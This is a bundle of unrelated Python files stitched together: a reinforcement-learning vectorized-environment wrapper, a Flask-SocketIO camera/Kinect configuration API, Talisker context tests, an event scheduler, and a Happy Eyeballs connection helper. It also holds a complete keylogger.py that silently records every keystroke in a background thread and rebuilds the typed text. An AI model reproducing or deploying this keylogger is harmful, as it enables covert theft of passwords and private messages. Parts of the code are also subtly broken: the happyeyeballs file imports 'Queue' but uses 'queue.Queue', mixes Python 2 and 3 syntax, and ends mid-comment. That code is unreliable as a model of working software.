app.run(use_reloader=False, host='0.0.0.0')
|
subproc_vec_env.py
|
import multiprocessing as mp
from collections import OrderedDict
from typing import Any, Callable, List, Optional, Sequence, Tuple, Type, Union
import gym
import numpy as np
from stable_baselines3.common.vec_env.base_vec_env import (
CloudpickleWrapper,
VecEnv,
VecEnvIndices,
VecEnvObs,
VecEnvStepReturn,
)
def _worker(
remote: mp.connection.Connection, parent_remote: mp.connection.Connection, env_fn_wrapper: CloudpickleWrapper
) -> None:
# Import here to avoid a circular import
from stable_baselines3.common.env_util import is_wrapped
parent_remote.close()
env = env_fn_wrapper.var()
while True:
try:
cmd, data = remote.recv()
if cmd == "step":
observation, reward, done, info = env.step(data)
if done:
# save final observation where user can get it, then reset
info["terminal_observation"] = observation
observation = env.reset()
remote.send((observation, reward, done, info))
elif cmd == "seed":
remote.send(env.seed(data))
elif cmd == "reset":
observation = env.reset()
remote.send(observation)
elif cmd == "render":
remote.send(env.render(data))
elif cmd == "close":
env.close()
remote.close()
break
elif cmd == "get_spaces":
remote.send((env.observation_space, env.action_space))
elif cmd == "get_coeff_dim":
                remote.send(env.coeff_dim)
elif cmd == "env_method":
method = getattr(env, data[0])
remote.send(method(*data[1], **data[2]))
elif cmd == "get_attr":
remote.send(getattr(env, data))
elif cmd == "set_attr":
remote.send(setattr(env, data[0], data[1]))
elif cmd == "is_wrapped":
remote.send(is_wrapped(env, data))
else:
raise NotImplementedError(f"`{cmd}` is not implemented in the worker")
except EOFError:
break
class SubprocVecEnv(VecEnv):
"""
Creates a multiprocess vectorized wrapper for multiple environments, distributing each environment to its own
process, allowing significant speed up when the environment is computationally complex.
For performance reasons, if your environment is not IO bound, the number of environments should not exceed the
number of logical cores on your CPU.
.. warning::
Only 'forkserver' and 'spawn' start methods are thread-safe,
which is important when TensorFlow sessions or other non thread-safe
libraries are used in the parent (see issue #217). However, compared to
'fork' they incur a small start-up cost and have restrictions on
global variables. With those methods, users must wrap the code in an
``if __name__ == "__main__":`` block.
For more information, see the multiprocessing documentation.
:param env_fns: Environments to run in subprocesses
:param start_method: method used to start the subprocesses.
Must be one of the methods returned by multiprocessing.get_all_start_methods().
Defaults to 'forkserver' on available platforms, and 'spawn' otherwise.
"""
def __init__(self, env_fns: List[Callable[[], gym.Env]], start_method: Optional[str] = None):
if start_method is None:
# Fork is not a thread safe method (see issue #217)
# but is more user friendly (does not require to wrap the code in
# a `if __name__ == "__main__":`)
forkserver_available = "forkserver" in mp.get_all_start_methods()
start_method = "forkserver" if forkserver_available else "spawn"
self.ctx = mp.get_context(start_method)
self.env_fns = env_fns
self.setup()
self.remotes[0].send(("get_spaces", None))
observation_space, action_space = self.remotes[0].recv()
self.remotes[0].send(("get_coeff_dim", None))
coeff_dim = self.remotes[0].recv()
self.coeff_dim = coeff_dim
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def setup(self):
self.waiting = False
self.closed = False
n_envs = len(self.env_fns)
self.remotes, self.work_remotes = zip(*[self.ctx.Pipe() for _ in range(n_envs)])
self.processes = []
for work_remote, remote, env_fn in zip(self.work_remotes, self.remotes, self.env_fns):
args = (work_remote, remote, CloudpickleWrapper(env_fn))
# daemon=True: if the main process crashes, we should not cause things to hang
process = self.ctx.Process(target=_worker, args=args, daemon=True) # pytype:disable=attribute-error
process.start()
self.processes.append(process)
work_remote.close()
# for p in self.processes:
# p.join()
def clean(self):
""" Kill and recreate process """
for p in self.processes:
p.terminate()
p.join()
self.setup()
def step_async(self, actions: np.ndarray) -> None:
for remote, action in zip(self.remotes, actions):
remote.send(("step", action))
self.waiting = True
def step_wait(self) -> VecEnvStepReturn:
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return _flatten_obs(obs, self.observation_space), np.stack(rews), np.stack(dones), infos
def seed(self, seed: Optional[int] = None) -> List[Union[None, int]]:
        for idx, remote in enumerate(self.remotes):
            # offset the seed per worker so the envs do not share an RNG stream
            remote.send(("seed", seed + idx if seed is not None else None))
return [remote.recv() for remote in self.remotes]
def reset(self) -> VecEnvObs:
for remote in self.remotes:
remote.send(("reset", None))
obs = [remote.recv() for remote in self.remotes]
return _flatten_obs(obs, self.observation_space)
def close(self) -> None:
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(("close", None))
for process in self.processes:
process.join()
self.closed = True
def get_images(self) -> Sequence[np.ndarray]:
for pipe in self.remotes:
# gather images from subprocesses
# `mode` will be taken into account later
pipe.send(("render", "rgb_array"))
imgs = [pipe.recv() for pipe in self.remotes]
return imgs
def get_attr(self, attr_name: str, indices: VecEnvIndices = None) -> List[Any]:
"""Return attribute from vectorized environment (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("get_attr", attr_name))
return [remote.recv() for remote in target_remotes]
def set_attr(self, attr_name: str, value: Any, indices: VecEnvIndices = None) -> None:
"""Set attribute inside vectorized environments (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("set_attr", (attr_name, value)))
for remote in target_remotes:
remote.recv()
def env_method(self, method_name: str, *method_args, indices: VecEnvIndices = None, **method_kwargs) -> List[Any]:
"""Call instance methods of vectorized environments."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("env_method", (method_name, method_args, method_kwargs)))
return [remote.recv() for remote in target_remotes]
def env_is_wrapped(self, wrapper_class: Type[gym.Wrapper], indices: VecEnvIndices = None) -> List[bool]:
"""Check if worker environments are wrapped with a given wrapper"""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("is_wrapped", wrapper_class))
return [remote.recv() for remote in target_remotes]
def _get_target_remotes(self, indices: VecEnvIndices) -> List[Any]:
"""
Get the connection object needed to communicate with the wanted
envs that are in subprocesses.
:param indices: refers to indices of envs.
:return: Connection object to communicate between processes.
"""
indices = self._get_indices(indices)
return [self.remotes[i] for i in indices]
def _flatten_obs(obs: Union[List[VecEnvObs], Tuple[VecEnvObs]], space: gym.spaces.Space) -> VecEnvObs:
"""
Flatten observations, depending on the observation space.
:param obs: observations.
A list or tuple of observations, one per environment.
Each environment observation may be a NumPy array, or a dict or tuple of NumPy arrays.
:return: flattened observations.
A flattened NumPy array or an OrderedDict or tuple of flattened numpy arrays.
Each NumPy array has the environment index as its first axis.
"""
assert isinstance(obs, (list, tuple)), "expected list or tuple of observations per environment"
assert len(obs) > 0, "need observations from at least one environment"
if isinstance(space, gym.spaces.Dict):
assert isinstance(space.spaces, OrderedDict), "Dict space must have ordered subspaces"
assert isinstance(obs[0], dict), "non-dict observation for environment with Dict observation space"
return OrderedDict([(k, np.stack([o[k] for o in obs])) for k in space.spaces.keys()])
elif isinstance(space, gym.spaces.Tuple):
assert isinstance(obs[0], tuple), "non-tuple observation for environment with Tuple observation space"
obs_len = len(space.spaces)
return tuple((np.stack([o[i] for o in obs]) for i in range(obs_len)))
else:
return np.stack(obs)
|
keylogger.py
|
# Date: 09/30/2018
# Author: Pure-L0G1C
# Description: Keylogger
from threading import Thread
from pynput.keyboard import Key, Listener
class Keylogger(object):
def __init__(self):
self.data = []
self.lastkey = None
self.listener = None
self.is_alive = True
self.num_to_symbol = {
'1': '!', '2': '@', '3': '#', '4': '$', '5': '%',
'6': '^', '7': '&', '8': '*', '9': '(', '0': ')'
}
self.sym_to_symbol = {
'`': '~', ',': '<', '.': '>', '/': '?', '\'': '\"', '\\': '|',
';': ':', '[': '{', ']': '}', '-': '_', '=': '+'
}
def _start(self):
with Listener(on_press=self.on_press, on_release=self.on_release) as self.listener:
self.listener.join()
def start(self):
Thread(target=self._start, daemon=True).start()
def stop(self):
self.listener.stop()
self.is_alive = False
def dump(self):
data = ''
if not self.is_empty():
data = ''.join(self.data)
print(data)
self.data = []
return data if data else '-1'
def on_release(self, key):
if any([key == Key.shift, key == Key.shift_r]):
self.lastkey = None
def on_press(self, key):
value = None
if key == Key.backspace:
if len(self.data):
del self.data[-1]
elif key == Key.tab:
value = '\t'
elif key == Key.enter:
value = '\n'
elif key == Key.space:
value = ' '
elif len(str(key)) == 3:
value = self.check_for_shift(key)
else:
self.lastkey = key
        if value is not None:
            self.data.append(value)
    def check_for_shift(self, key):
        key = key.char
        if any([self.lastkey == Key.shift, self.lastkey == Key.shift_r]):
            if key.isalpha():
                key = key.upper()
            elif key.isdigit():
                key = self.num_to_symbol[key]
            elif key in self.sym_to_symbol:
                key = self.sym_to_symbol[key]
        return key
def is_empty(self):
is_empty = True
for data in self.data:
if data.strip():
is_empty = False
break
return is_empty
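# Minimal usage sketch (illustrative): run the listener in the background
# and periodically dump whatever has been captured.
if __name__ == '__main__':
    import time
    kl = Keylogger()
    kl.start()
    try:
        while kl.is_alive:
            time.sleep(5)
            kl.dump()
    except KeyboardInterrupt:
        kl.stop()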
|
instanceConfiguration_api.py
|
from flask_socketio import emit
from src.model import (ToggleKinectEnable, GetKinectEnable)
from src.model.InstanceConfiguration import InstanceConfiguration
from src.server import socketio
from time import sleep
import threading
@socketio.on('create_instance_configuration')
def create_instance_configuration(details):
"""
Create an instance configuration
:param details: object details about the instance configuration
:param details["sessionId"] string id of a session
:param details["userId"] string id of a user
:param details["cameraHost"] string host of the camera
:param details["cameraPort"] integer port of the camera
:param details["kinectHost"] string host of the kinect
:param details["kinectPort"] integer port of the kinect
:param details["topLeft"] object details about the topLeft calibration coordinate (Optional)
:param details["topLeft"]["x"] integer the X coordinate of the topLeft point
:param details["topLeft"]["y"] integer the Y coordinate of the topLeft point
:param details["topRight"] object details about the topRight calibration coordinate (Optional)
:param details["topRight"]["x"] integer the X coordinate of the topRight point
:param details["topRight"]["y"] integer the Y coordinate of the topRight point
:param details["bottomLeft"] object details about the bottomLeft calibration coordinate (Optional)
:param details["bottomLeft"]["x"] integer the X coordinate of the bottomLeft point
:param details["bottomLeft"]["y"] integer the Y coordinate of the bottomLeft point
:param details["bottomRight"] object details about the bottomRight calibration coordinate (Optional)
:param details["bottomRight"]["x"] integer the X coordinate of the bottomRight point
:param details["bottomRight"]["y"] integer the Y coordinate of the bottomRight point
:return: an instance configuration object eg:
{
"id": "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa",
"sessionId": "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa",
"userId": "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa",
"kinect": {
"host": "localhost",
"port": 8080,
},
"camera": {
"host": "localhost",
"port": "8080",
},
"topLeft": {
"x": 0,
"y": 100
},
"topRight": {
"x": 0,
"y": 100
},
"bottomRight": {
"x": 0,
"y": 100
},
"bottomLeft": {
"x": 0,
"y": 100
}
}
"""
config = InstanceConfiguration(sessionId=details["sessionId"],
userId=details["userId"],
cameraHost=details["camera"]["host"],
cameraPort=details["camera"]["port"],
kinectHost=details["kinect"]["host"],
kinectPort=details["kinect"]["port"],
topLeftX=details["topLeft"]["x"] if "topLeft" in details else None,
topLeftY=details["topLeft"]["y"] if "topLeft" in details else None,
topRightX=details["topRight"]["x"] if "topRight" in details else None,
topRightY=details["topRight"]["y"] if "topRight" in details else None,
bottomRightX=details["bottomRight"]["x"] if "bottomRight" in details else None,
bottomRightY=details["bottomRight"]["y"] if "bottomRight" in details else None,
bottomLeftX=details["bottomLeft"]["x"] if "bottomLeft" in details else None,
bottomLeftY=details["bottomLeft"]["y"] if "bottomLeft" in details else None,
kinectTopLeftX=details["kinectTopLeft"]["x"] if "kinectTopLeft" in details else None,
kinectTopLeftY=details["kinectTopLeft"]["y"] if "kinectTopLeft" in details else None,
kinectTopRightX=details["kinectTopRight"]["x"] if "kinectTopRight" in details else None,
kinectTopRightY=details["kinectTopRight"]["y"] if "kinectTopRight" in details else None,
kinectBottomRightX=details["kinectBottomRight"]["x"] if "kinectBottomRight" in details else None,
kinectBottomRightY=details["kinectBottomRight"]["y"] if "kinectBottomRight" in details else None,
kinectBottomLeftX=details["kinectBottomLeft"]["x"] if "kinectBottomLeft" in details else None,
kinectBottomLeftY=details["kinectBottomLeft"]["y"] if "kinectBottomLeft" in details else None,
)
emit('create_instance_configuration', config.create().as_object())
@socketio.on('get_instance_configurations')
def get_instance_configurations():
emit('get_instance_configurations', [cfg.as_object() for cfg in InstanceConfiguration.get_all()])
@socketio.on('delete_instance_configuration')
def delete_instance_configuration(configurationId):
emit('delete_instance_configuration', InstanceConfiguration.get(configurationId).delete())
@socketio.on('update_instanceConfig')
def update_instanceConfig(id, details):
print(id)
print(details)
config = InstanceConfiguration.get(id=id)
config.sessionId = details["sessionId"]
config.userId = details["userId"]
config.cameraHost = details["camera"]["host"]
config.cameraPort = details["camera"]["port"]
config.kinectHost = details["kinect"]["host"]
config.kinectPort = details["kinect"]["port"]
config.topLeftX = details["topLeft"]["x"] if "topLeft" in details else None
config.topLeftY = details["topLeft"]["y"] if "topLeft" in details else None
config.topRightX = details["topRight"]["x"] if "topRight" in details else None
config.topRightY = details["topRight"]["y"] if "topRight" in details else None
config.bottomRightX = details["bottomRight"]["x"] if "bottomRight" in details else None
config.bottomRightY = details["bottomRight"]["y"] if "bottomRight" in details else None
config.bottomLeftX = details["bottomLeft"]["x"] if "bottomLeft" in details else None
config.bottomLeftY = details["bottomLeft"]["y"] if "bottomLeft" in details else None
config.kinectTopLeftX = details["kinectTopLeft"]["x"] if "kinectTopLeft" in details else None
config.kinectTopLeftY = details["kinectTopLeft"]["y"] if "kinectTopLeft" in details else None
config.kinectTopRightX = details["kinectTopRight"]["x"] if "kinectTopRight" in details else None
config.kinectTopRightY = details["kinectTopRight"]["y"] if "kinectTopRight" in details else None
config.kinectBottomRightX = details["kinectBottomRight"]["x"] if "kinectBottomRight" in details else None
config.kinectBottomRightY = details["kinectBottomRight"]["y"] if "kinectBottomRight" in details else None
config.kinectBottomLeftX = details["kinectBottomLeft"]["x"] if "kinectBottomLeft" in details else None
config.kinectBottomLeftY = details["kinectBottomLeft"]["y"] if "kinectBottomLeft" in details else None
emit('update_instanceConfig', config.update().as_object())
@socketio.on('update_instanceConfig_coords')
def update_instanceConfig_coords(id, data):
config = InstanceConfiguration.get(id=id)
config.topLeftX = data["topLeft"]["x"]
config.topLeftY = data["topLeft"]["y"]
config.topRightX = data["topRight"]["x"]
config.topRightY = data["topRight"]["y"]
config.bottomRightX = data["bottomRight"]["x"]
config.bottomRightY = data["bottomRight"]["y"]
config.bottomLeftX = data["bottomLeft"]["x"]
config.bottomLeftY = data["bottomLeft"]["y"]
config.update()
@socketio.on('update_instanceConfig_kinectCoords')
def update_instanceConfig_kinectCoords(id, data):
config = InstanceConfiguration.get(id=id)
config.kinectTopLeftX = data["kinectTopLeft"]["x"]
config.kinectTopLeftY = data["kinectTopLeft"]["y"]
config.kinectTopRightX = data["kinectTopRight"]["x"]
config.kinectTopRightY = data["kinectTopRight"]["y"]
config.kinectBottomRightX = data["kinectBottomRight"]["x"]
config.kinectBottomRightY = data["kinectBottomRight"]["y"]
config.kinectBottomLeftX = data["kinectBottomLeft"]["x"]
config.kinectBottomLeftY = data["kinectBottomLeft"]["y"]
config.update()
def calibrate(id):
print("Waiting for cameras to adjust...")
sleep(0.5)
ic = InstanceConfiguration.get(id=id).calibrate().update()
socketio.emit('blank_canvas_black', id, broadcast=True)
# socketio.emit('calibrate_instance_configuration', ic.as_object(), broadcast=True)
socketio.emit('draw_canvas', broadcast=True)
print('Calibrated')
@socketio.on('calibrate_instance_configuration')
def calibrate_instance_configuration(instanceConfigId):
"""
Calibrate an instance configuration by trying to connect to the camera and auto-extracting projector bounds
"""
print('Calibrating instance configuration {}'.format(instanceConfigId))
emit('blank_canvas_white', instanceConfigId, broadcast=True)
threading.Thread(target=calibrate, args=(instanceConfigId,)).start()
@socketio.on('purge_instance_configurations')
def purge_instance_configurations():
InstanceConfiguration.delete_all()
@socketio.on('get_latest_image_id_by_instance_configuration')
def get_latest_image_id_by_instance_configuration(instanceConfigId):
ic = InstanceConfiguration.get(instanceConfigId)
emit('get_latest_image_id_by_instance_configuration', ic.get_latest_image_id())
@socketio.on('toggle_kinect_enable')
def toggle_kinect_enable():
ToggleKinectEnable()
print("kinectEnable = {}".format(GetKinectEnable()))
@socketio.on('get_kinect_image_url')
def get_kinect_image_url(icId):
ic = InstanceConfiguration.get(id=icId)
    emit('get_kinect_image_url', "http://" + ic.kinectHost + ":" + str(ic.kinectPort) + "/calibrate")
print('Registered Instance Configuration API methods')
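# Illustrative client-side call (assumes a socket.io client `sio` connected
# to this server; the field values are placeholders):
#
#     sio.emit('create_instance_configuration', {
#         'sessionId': '...', 'userId': '...',
#         'camera': {'host': 'localhost', 'port': 8080},
#         'kinect': {'host': 'localhost', 'port': 8081},
#     })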
|
test_context.py
|
#
# Copyright (c) 2015-2018 Canonical, Ltd.
#
# This file is part of Talisker
# (see http://github.com/canonical-ols/talisker).
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import * # noqa
import sys
import threading
import time
from freezegun import freeze_time
import future.utils
import pytest
from talisker.context import (
Context,
ContextStack,
NullContextStack,
enable_gevent_context,
enable_eventlet_context,
request_timeout,
)
def test_context_api():
Context.new()
Context.logging.push(a=1)
Context.request_id = 'id'
Context.track('test', 1.0)
assert Context.current().logging.flat == {'a': 1}
assert Context.current().request_id == 'id'
assert Context.current().tracking['test'].count == 1
assert Context.current().tracking['test'].time == 1.0
Context.clear()
assert Context.current().logging.flat == {}
assert Context.current().request_id is None
assert Context.current().tracking == {}
def test_null_context():
Context.request_id = 'test'
Context.set_debug()
Context.soft_timeout = 10
Context.set_relative_deadline(10)
Context.track('sql', 1.0)
assert Context.request_id is None
assert Context.debug is False
assert Context.soft_timeout == -1
assert Context.deadline_timeout() is None
assert Context.current().tracking == {}
with Context.logging(foo='bar'):
assert Context.logging.flat == {}
def test_context_thread():
e1 = threading.Event()
e2 = threading.Event()
def worker():
Context.new()
Context.logging.push(a=2)
Context.track('test', 1.0)
e1.set()
e2.wait()
assert Context.logging.flat == {'a': 2}
Context.logging.pop()
e1.set()
assert Context.logging.flat == {}
assert Context.current().tracking['test'].count == 1
t = threading.Thread(target=worker)
Context.new()
Context.track('test', 1.0)
Context.logging.push(a=1)
assert Context.logging.flat == {'a': 1}
t.start()
e1.wait()
e1.clear()
assert Context.logging.flat == {'a': 1}
assert Context.current().tracking['test'].count == 1
e2.set()
e1.wait()
assert Context.logging.flat == {'a': 1}
t.join()
def test_context_gevent(request):
try:
import gevent
except ImportError:
pytest.skip('gevent must be installed')
request.addfinalizer(enable_gevent_context())
def f1():
assert Context.logging.flat == {}
Context.logging.push({'f1': 1})
Context.track('gevent', 1.0)
assert Context.logging.flat == {'f1': 1}
assert Context.current().tracking['gevent'].count == 1
gevent.sleep(0.2) # yield to let f2 run
assert Context.logging.flat == {'f1': 1}
assert Context.current().tracking['gevent'].count == 1
def f2():
assert Context.logging.flat == {}
Context.logging.push({'f2': 2})
Context.track('gevent', 1.0)
assert Context.current().tracking['gevent'].count == 1
assert Context.logging.flat == {'f2': 2}
g1 = gevent.spawn(f1)
g2 = gevent.spawn(f2)
gevent.joinall([g1, g2], timeout=2)
@pytest.mark.skipif(sys.version_info >= (3, 7), reason="<py3.7 only")
def test_context_eventlet(request):
try:
import eventlet
except ImportError:
pytest.skip('eventlet must be installed')
request.addfinalizer(enable_eventlet_context())
def f1():
assert Context.logging.flat == {}
Context.logging.push({'f1': 1})
Context.track('gevent', 1.0)
assert Context.logging.flat == {'f1': 1}
assert Context.current().tracking['gevent'].count == 1
eventlet.sleep(0.2) # yield to let f2 run
assert Context.logging.flat == {'f1': 1}
assert Context.current().tracking['gevent'].count == 1
def f2():
assert Context.logging.flat == {}
Context.logging.push({'f2': 2})
Context.track('gevent', 1.0)
assert Context.current().tracking['gevent'].count == 1
assert Context.logging.flat == {'f2': 2}
pool = eventlet.GreenPool()
pool.spawn(f1)
pool.spawn(f2)
pool.waitall()
if future.utils.PY3:
from tests.py3_asyncio_context import test_context_asyncio # NOQA
def test_stack_basic():
stack = ContextStack()
stack.push(a=1)
assert stack['a'] == 1
assert list(stack.items()) == [('a', 1)]
stack.push(b=2)
assert stack['b'] == 2
assert list(stack.items()) == [('b', 2), ('a', 1)]
stack.push(a=3)
assert stack['a'] == 3
assert list(stack.items()) == [('a', 3), ('b', 2)]
stack.pop()
assert stack['a'] == 1
assert list(stack.items()) == [('b', 2), ('a', 1)]
stack.pop()
assert stack['a'] == 1
assert list(stack.items()) == [('a', 1)]
stack.pop()
with pytest.raises(KeyError):
stack['a']
assert list(stack.items()) == []
def test_stack_context_manager():
stack = ContextStack()
stack.push(a=1)
assert list(stack.items()) == [('a', 1)]
with stack(b=2):
assert list(stack.items()) == [('b', 2), ('a', 1)]
assert list(stack.items()) == [('a', 1)]
def test_stack_dict_arg():
stack = ContextStack()
with stack({'a': 1}):
assert list(stack.items()) == [('a', 1)]
with stack({'a': 1}, b=2):
# order not preserved, as kwargs
assert dict(stack) == {'a': 1, 'b': 2}
def test_stack_unwind():
stack = ContextStack()
stack.push(a=1)
assert stack['a'] == 1
level = stack.push(a=2)
assert stack['a'] == 2
stack.push(a=3)
stack.push(a=4)
assert stack['a'] == 4
stack.unwind(level)
assert stack['a'] == 1
def test_null_context_stack():
stack = NullContextStack()
stack.push(a=1)
assert dict(stack) == {}
assert stack.flat == {}
def test_does_not_use_or_modify_dict():
stack = ContextStack()
d = {'a': 1}
stack.push(d, b=2)
assert stack['a'] == 1
assert stack['b'] == 2
assert d == {'a': 1}
d['a'] = 2
assert stack['a'] == 1
def test_tracking():
Context.new()
Context.track('sql', 1.0)
Context.track('sql', 2.0)
Context.track('http', 3.0)
assert Context.current().tracking['sql'].count == 2
assert Context.current().tracking['sql'].time == 3.0
assert Context.current().tracking['http'].count == 1
assert Context.current().tracking['http'].time == 3.0
@freeze_time()
def test_request_timeout():
Context.new()
result = {}
@request_timeout(timeout=1000, soft_timeout=500)
def f():
result['timeout'] = Context.current().deadline
result['soft_timeout'] = Context.soft_timeout
f()
assert result['timeout'] == time.time() + 1.0
assert result['soft_timeout'] == 500
|
scheduler.py
|
import threading
import time
import logging
logger = logging.getLogger(__name__)
class Event:
def __init__(self, callback, param):
self.callback = callback
self.param = param
def trigger(self, *args):
if self.param is None:
self.callback(*args)
else:
self.callback(*args, self.param)
def kill(self):
if self in events:
events.remove(self)
def update(self): raise NotImplementedError("Event.update")
class Socket(Event):
def __init__(self, callback, param, socket):
super().__init__(callback, param)
self.socket = socket
def update(self):
data = self.socket.recv()
if data is not None:
self.trigger(data)
class Timeout(Event):
def __init__(self, callback, param, timeout, repeat=False):
super().__init__(callback, param)
self.timeout = timeout
self.repeat = repeat
self.reset()
def update(self):
if time.time() > self.deadline:
self.trigger()
if self.repeat:
self.reset()
else:
self.kill()
def reset(self):
self.deadline = time.time() + self.timeout
thread = None
events = []
def add_socket(callback, socket, param=None):
start_thread()
event = Socket(callback, param, socket)
events.append(event)
return event
def add_timeout(callback, timeout, repeat=False, param=None):
start_thread()
event = Timeout(callback, param, timeout, repeat)
events.append(event)
return event
def remove(event):
event.kill()
def process_events():
for event in events[:]:
try:
event.update()
        except Exception:
logger.error("An exception occurred while processing an event")
import traceback
traceback.print_exc()
event.kill()
def update():
if threading.current_thread() == thread:
process_events()
def start_thread():
global thread
if not thread:
thread = threading.Thread(target=event_loop, daemon=True)
thread.start()
def event_loop():
while True:
process_events()
time.sleep(0.02)
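# Usage sketch (illustrative): register a repeating timeout and let the
# background event-loop thread fire it a few times.
if __name__ == '__main__':
    def on_tick():
        print("tick")
    add_timeout(on_tick, 0.5, repeat=True)
    time.sleep(2)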
|
happyeyeballs.py
|
#!/usr/bin/env python
# Python implementation of RFC 6555 / Happy Eyeballs: find the quickest IPv4/IPv6 connection
# See https://tools.ietf.org/html/rfc6555
# Method: Start parallel sessions using threads, and only wait for the quickest successful socket connect
# If the HOST has an IPv6 address, IPv6 is given a head start by delaying IPv4. See https://tools.ietf.org/html/rfc6555#section-4.1
# You can run this as a standalone program, or as a module:
"""
from happyeyeballs import happyeyeballs
print happyeyeballs('newszilla.xs4all.nl', port=119)
"""
# or with more logging:
'''
from happyeyeballs import happyeyeballs
import logging
logger = logging.getLogger('')
logger.setLevel(logging.DEBUG)
print happyeyeballs('newszilla.xs4all.nl', port=119)
'''
import socket
import ssl
import Queue
import threading
import time
import logging
DEBUG = False
# called by each thread
def do_socket_connect(queue, ip, PORT, SSL, ipv4delay):
# connect to the ip, and put the result into the queue
if DEBUG: logging.debug("Input for thread is %s %s %s", ip, PORT, SSL)
try:
# CREATE SOCKET
if ip.find(':') >= 0:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
if ip.find('.') >= 0:
time.sleep(ipv4delay) # IPv4 ... so a delay for IPv4 as we prefer IPv6. Note: ipv4delay could be 0
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
if not SSL:
# Connect ...
s.connect((ip, PORT))
# ... and close
s.close()
else:
# WRAP SOCKET
wrappedSocket = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
# CONNECT
wrappedSocket.connect((ip, PORT))
# CLOSE SOCKET CONNECTION
wrappedSocket.close()
queue.put((ip, True))
if DEBUG: logging.debug("connect to %s OK", ip)
    except Exception:
        queue.put((ip, False))
        if DEBUG: logging.debug("connect to %s not OK", ip)
def happyeyeballs(HOST, **kwargs):
# Happyeyeballs function, with caching of the results
# Fill out the parameters into the variables
    PORT = kwargs.get('port', 80)
    SSL = kwargs.get('ssl', False)
    preferipv6 = kwargs.get('preferipv6', True)  # prefer IPv6, so give IPv6 connects a head start by delaying IPv4
# Find out if a cached result is available, and recent enough:
timecurrent = int(time.time()) # current time in seconds since epoch
retentionseconds = 100
hostkey = (HOST, PORT, SSL, preferipv6) # Example key: (u'ssl.astraweb.com', 563, True, True)
    if hostkey in happyeyeballs.happylist:
        # Entry exists, so check whether it is recent enough:
        timecached = happyeyeballs.happylist[hostkey][1]
        if timecurrent - timecached <= retentionseconds:
            if DEBUG: logging.debug("existing cached result recent enough")
            return happyeyeballs.happylist[hostkey][0]
        if DEBUG: logging.debug("existing cached result too old. Find a new one")
        # Continue a few lines down
    else:
        # Entry not there, so we have to fill it out
        if DEBUG: logging.debug("Host not yet in the cache. Find entry")
# we only arrive here if the entry has to be determined. So let's do that:
# We have to determine the (new) best IP address
    start = time.monotonic()  # time.clock() was removed in Python 3.8
if DEBUG: logging.debug("\n\n%s %s %s %s", HOST, PORT, SSL, preferipv6)
ipv4delay = 0
try:
# Check if there is an AAAA / IPv6 result for this host:
socket.getaddrinfo(HOST, PORT, socket.AF_INET6, socket.SOCK_STREAM, socket.IPPROTO_IP, socket.AI_CANONNAME)
if DEBUG: logging.debug("IPv6 address found for %s", HOST)
if preferipv6:
ipv4delay=0.1 # preferipv6, AND at least one IPv6 found, so give IPv4 (!) a delay so that IPv6 has a head start and is preferred
    except socket.gaierror:
if DEBUG: logging.debug("No IPv6 address found for %s", HOST)
    myqueue = queue.Queue()  # queue used for threads giving back the results
try:
# Get all IP (IPv4 and IPv6) addresses:
allinfo = socket.getaddrinfo(HOST, PORT, 0, 0, socket.IPPROTO_TCP)
for info in allinfo:
address = info[4][0]
thisthread = threading.Thread(target=do_socket_connect, args=(myqueue, address, PORT, SSL, ipv4delay))
thisthread.daemon = True
thisthread.start()
result = None # default return value, used if none of threads says True/"OK", so no connect on any IP address
# start reading from the Queue for message from the threads:
for i in range(len(allinfo)):
s = myqueue.get() # get a response
if s[1] == True:
result = s[0]
break # the first True/"OK" is enough, so break out of for loop
    except Exception:
if DEBUG: logging.debug("something went wrong in the try block")
result = None
logging.info("Quickest IP address for %s (port %s, ssl %s, preferipv6 %s) is %s", HOST, PORT, SSL, preferipv6, result)
    delay = int(1000 * (time.monotonic() - start))
logging.debug("Happy Eyeballs lookup and port connect took %s ms", delay)
# We're done. Store and return the result
if result:
happyeyeballs.happylist[hostkey] = ( result, timecurrent )
if DEBUG: logging.debug("Determined new result for %s with result %s", (hostkey, happyeyeballs.happylist[hostkey]) )
return result
happyeyeballs.happylist = {} # The cached results. This static variable must be after the def happyeyeballs()
if __name__ == '__main__':
logger = logging.getLogger('')
logger.setLevel(logging.INFO)
if DEBUG: logger.setLevel(logging.DEBUG)
# plain HTTP/HTTPS sites:
    print(happyeyeballs('www.google.com'))
    print(happyeyeballs('www.google.com', port=443, ssl=True))
    print(happyeyeballs('www.nu.nl'))
    # newsservers:
    print(happyeyeballs('newszilla6.xs4all.nl', port=119))
    print(happyeyeballs('newszilla.xs4all.nl', port=119))
    print(happyeyeballs('block.cheapnews.eu', port=119))
    print(happyeyeballs('block.cheapnews.eu', port=443, ssl=True))
    print(happyeyeballs('sslreader.eweka.nl', port=563, ssl=True))
    print(happyeyeballs('news.thundernews.com', port=119))
    print(happyeyeballs('news.thundernews.com', port=119, preferipv6=False))
    print(happyeyeballs('secure.eu.thundernews.com', port=563, ssl=True))
    # Strange cases
    print(happyeyeballs('does.not.resolve', port=443, ssl=True))
    print(happyeyeballs('www.google.com', port=119))
    print(happyeyeballs('216.58.211.164'))
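    # Editorial sketch: a repeated lookup within retentionseconds (100 s) is
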